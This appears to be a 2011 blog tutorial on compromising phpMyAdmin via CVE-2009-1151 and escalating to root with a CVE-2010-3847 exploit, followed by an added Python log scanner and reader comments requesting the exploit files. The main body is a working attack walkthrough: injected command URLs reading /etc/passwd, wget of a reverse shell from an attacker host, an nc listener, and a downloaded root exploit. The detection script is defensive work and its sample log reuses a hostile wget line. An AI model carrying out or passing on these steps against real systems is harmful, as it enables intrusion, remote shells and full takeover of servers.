Friday 11 February 2011

SQL Injection on phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

PHPMYADMIN SQL INJECTION
CVE: CVE-2009-1151
Remote: Yes
Local: No

ROOT
CVE-2010-3847
Remote: No
Local: Yes

0) Download the php exploit from http://securityreason.com/exploitalert/6399
   Download the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257


1) Run the exploit against the target machine.
[root@bt]# ./php_exploit  http://mytargettest.com/phpMyAdmin/

[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com

2) Great, that means it worked; now you can run commands on the target machine.

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test   (make sure you can write there and the file is present)

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell   (download your reverse shell)

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell   (make it executable)

3) Now the reverse shell is on the target machine, ready to run. On my own machine I start a listener:
   nc -l -p 8080 -vvv

4) Then I execute the reverse shell on the target so it connects back to my machine:
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
  
5) Great, now you have a shell; the next step is to get root.
id

6) cd /tmp/ ; mkdir hack ; cd hack
   wget http://172.16.1.79/exploits/get_root
   wget http://172.16.1.79/exploits/payload.c

7) Run the exploit to get root and that's it.
chmod +x ./get_root
./get_root
id

Game over!
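Every post-exploitation request in steps 1 and 2 hits phpMyAdmin's config/config.inc.php with a c= or p= query parameter, after the setup script was used to write into it (phpMyAdmin's own instructions say to delete the config directory once setup is done). As an added defensive example that is not part of the original post, the Python below parses constructed Apache combined-log lines and flags POSTs to setup.php and any request that reaches config/config.inc.php; the IPs, timestamps and the 203.0.113.7 host are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log sample; IPs, times and the 203.0.113.7 host are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2011:10:01:12 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Feb/2011:10:02:40 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 812 "-" "python-urllib/2.6"
10.0.0.9 - - [11/Feb/2011:10:02:41 +0000] "GET /phpMyAdmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Feb/2011:10:03:05 +0000] "GET /phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://203.0.113.7/x HTTP/1.1" 200 10 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Feb/2011:10:04:00 +0000] "GET /phpMyAdmin/config/config.inc.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
CONFIG_PATH = re.compile(r'/config/config\.inc\.php$')   # file the injected PHP ends up in
SETUP_PATH = re.compile(r'/setup\.php$')                  # script that writes that file
SUSPECT_PARAMS = ("c", "p")   # c= shell command, p= PHP code, as in the post's URLs

def classify(line):
    """Return (ip, verdict, detail) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = re.sub(r"/+", "/", url.path)   # normalise the doubled slash seen in the post's URLs
    qs = parse_qs(url.query)
    if CONFIG_PATH.search(path):
        hit = [k for k in SUSPECT_PARAMS if k in qs]
        if hit and m["status"] == "200":
            # config.inc.php served a request carrying c=/p=: the injected code is live.
            return (m["ip"], "backdoor-command", {k: qs[k][0] for k in hit})
        # Any other request reaching config/ is still worth review; it should not exist in production.
        return (m["ip"], "config-access", m["status"])
    if SETUP_PATH.search(path) and m["method"] == "POST":
        return (m["ip"], "setup-post", m["status"])
    return (m["ip"], "ok", None)

def scan(text):
    """Run classify over every line and return only the findings, in log order."""
    results = (classify(l) for l in text.splitlines())
    return [r for r in results if r is not None and r[1] != "ok"]

if __name__ == "__main__":
    for ip, verdict, detail in scan(SAMPLE_LOG):
        print(f"{ip:<12} {verdict:<18} {detail}")
```

A 403 on config/config.inc.php is the healthy case (the directory is blocked or gone); a 200 with c= or p= means the file is serving attacker input.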

15 comments:

  1. Hey man, nice tutorial. I would like to get in touch with you. Do you have an email or messenger?

  2. Sure, my email is pochackblog@gmail.com.
    I will be posting my FTP here soon so everyone can download all the needed stuff from it.

  3. Hey, where can I get the get_root exploit from the link? If you can upload it somewhere I would greatly appreciate it :) Thanks in advance!!!

  4. What's that program's name? Metasploit?

  5. Nope, it's just an exploit, as I said.

  6. When I write php_exploit it says no such file or directory

  7. You need to download the exploit first.

    1. Where from? There isn't a download link on that page... Do you mean you have to create a file and copy/paste the code from that link?

  8. I'm really a newbie in IT, but I want to study things like this, because in my country I don't have it... Don't you want to give me this tutorial step by step? Please email me at rvirgian1@gmail.com

  9. Thanks indeed.
    I can't find the right link to download the exploit; would you please give it to me?
    N.B. the 1st link has been changed to http://cxsecurity.com/exploit
    Thanks

  10. I don't really get how to download it.
